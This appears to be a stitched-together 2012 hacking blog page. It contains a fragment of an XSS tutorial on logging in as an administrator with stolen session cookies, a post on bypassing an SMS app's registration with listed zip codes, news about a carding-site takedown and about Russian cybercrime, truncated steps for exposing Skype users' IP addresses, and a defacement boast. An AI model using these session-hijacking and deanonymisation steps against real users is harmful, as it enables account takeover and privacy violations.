Now that you have successfully setup and started your XSS exploitation, all you can do is wait until a user with higher privileges than you executes your script, preferably an administrator. Once you have a hit, you can now log in as that user, as long as the session is still valid. There are many ways to do this, but in this example I will use 'Add n' Edit Cookies', which is an add-on for FireFox. I am assuming you already have Add 'n Edit Cookies installed, if not refer to section two of the paper.

1. 1. Open FireFox.
2. 2. Click on Tools in the menu bar.
3. 3. Click on Cookie Editor.
4. 4. Click on Add.

Adding the cookie :

1. 5. In name, add the name of that cookie, (the bit before the =)
2. 6. In content, add the value.
3. 7. In host, add .site.com, unless its a sub domain or otherwise stated, (the dot infront of the domain name is important).
4. 8. In path, write /, unless you have the exact path where you want the cookie to be active.

Repeat this procedure until every cookie has been added. Once this is done, you can navigate to the website and check to see if you have logged in.

[#]A Less Detailed and Noob Friendly Tutorial Here

Friday 27 April 2012

Send Free SMS All Over The World Using Your Android Phone


Hey guys its my first post here on sending free sms over world hope you all will like it :))










  • First of all you have to download app for your android mobile, Download it from below link (contains .apk file) .
[#] Download link: http://www.mediafire.com/?r5btwfc622b08yn 
  • Now you have to install it in your Android Mobile .



























  • Open the app & then it will ask for registration, so register & while registration they ask some zip codes and that's very important to complete registration . write any one of the zip code form below .
1.    98660
2.    98661
3.    98662
3.    98663
4.    98664 
5.    98664
  • After completing registration, send free SMS to any where in world .

Note: 
  1. Even you can remove the advertisement . Just you have to open setting in app and go to signature and delete all and save it :)
  2. Now this is necessary to know that  they provide you some other Number like ''+1593933929'' , so before sending SMS to your your friends or any one just tell them i am using another sender number,  so kindly change send reply on my number. if they reply you on pinger no.(which they provided you) .


- This is an Post by Amar Shankar

Serious Organised Crime Agency shuts down 36 criminal websites

A joint operation by UK and US crime agencies has dealt a "significant" blow to cyber criminals, potentially saving in excess of £500m in fraud.
The UK's Serious Organised Crime Agency (SOCA) identified 36 websites specialising in selling stolen credit and debit card and online bank account details.
On Wednesday, in a joint operation with the FBI and US Department of Justice, SOCA shut them down.
SOCA said it had recovered over 2.5 million items of personal and financial information built up over the last two years. The UK crime agency has now passed this data on to financial institutions in the UK and overseas so they can help prevent these details being used for further frauds, and two men have been arrested.
Rob Rachwald, security firm Imperva's director of security strategy, said: "This is significant. Although hacktivism has gotten a ton of attention in recent months, for-profit hacking continues at a costly rate and taking these sites offline is a serious blow."
SOCA has been closely involved with global law enforcement agencies to tackle cyber crime. It said over the last two years it has been monitoring the way cyber criminals hand on stolen details to used in frauds.
Working with the FBI, the BKA in Germany, the KLPD in the Netherlands, the Ukraine Ministry of Internal Affairs, the Australian Federal Police, and the Romanian National Police, the UK crime agency said increasingly cyber criminals sell the stolen card and bank account details to other fraudsters using ecommerce-type platforms known as Automated Vending Carts (AVC's).
Lee Miles, SOCA's head of Cyber Operations, said: "This operation is an excellent example of the level of international cooperation being focused on tackling online fraud.
"Our activities have saved business, online retailers and financial institutions potential fraud losses estimated at more than half a billion pounds, and at the same time protected thousands of individuals from the distress caused by being a victim of fraud or identity crime."
Anyone visiting the sites now, such as ccstore.biz and cvvplaza.com will be presented with a message that the site has been seized by law enforcement.

Source

Russia cyber-crime market doubles in 2011, says report

Russian-speaking criminals grabbed more than a third of the entire global cybercrime market in 2011 as a growth in online fraud activity turned the country into a major digital crime superpower, a new report has suggested.
Russian cybercriminals earned $4.5 billion in 2011
The State and Trends of the Russian Digital Crime market 2011 from Russian security research company Group-IB estimates (using public and partner data) that the global cybercrime market reached around $12.5 billion (APS7.74 billion) in size during the year, with Russians and Russian speakers (including those outside the country) accounting for $4.5 billion of that total.
At the same time, using its own internally-collected analysis, the Russia-only cybercrime market doubled to $2.3 billion compared to 2010, a disproportionate level of activity considering the country's modest 143 million population.
The top Russian cybercrime activity was online fraud, equivalent to almost a billion dollars in revenue, just ahead of spam on $830 million, internal market services on $230 million and DDoS on with $130 million.
As well as startling growth, the Russian cybercrime scene also saw consolidation into larger, more organised groups increasingly controlled by conventional crime mafias. There was also evidence of co-operation between these groups, and the growth of an important internal 'crime-to-crime' (C2C) market to support its activities.
Coming from a Russian-based group of researchers, the report makes fascinating reading. There is a wealth of anecdotal evidence from crime busts and malware trends that Russia is a key hub for crybercrime but hard numbers are seldom put on its inner workings or business model.
The researchers note the case of Yevgeniy Anikin and Viktor Pleschuk, who were part of the gang that stole $10 million from the Royal bank of Scotland's WorldPay ATM system in 2008 And yet received suspended sentences from Russian courts.
"Thus, because of imperfections in Russian laws and the lack of severe penalties, stable law enforcement practice, and regular training regarding counter cybercrime measures, cybercriminals are disproportionately [not held] liable for the crimes they commit," note the researchers.

"The cybercrime market originating from Russia costs the global economy billions of dollars every year," said Group-IB's CEO, Ilya Sachkov.

Skype user IP-address disclosure

    1. Downloading this patched version of Skype 5.5:    http://skype-open-source.blogspot.com/2012/03/skype55-deobfuscated-released.html         2. Turn on debug-log file creation via adding a few registry keys.    https://github.com/skypeopensource/skypeopensource/wiki/skype-3.x-4.x-5.x-enable-logging         3. Make "add a Skype contact" action, but not send add request, just click on user, to

19 Sites Hacked by TeamYHI

There deface pages have been patched but mirrors available Here..Some day Ago This Team Hacked 10 Website . And again hacked 19 website !
 





Sites:-

mirrors:-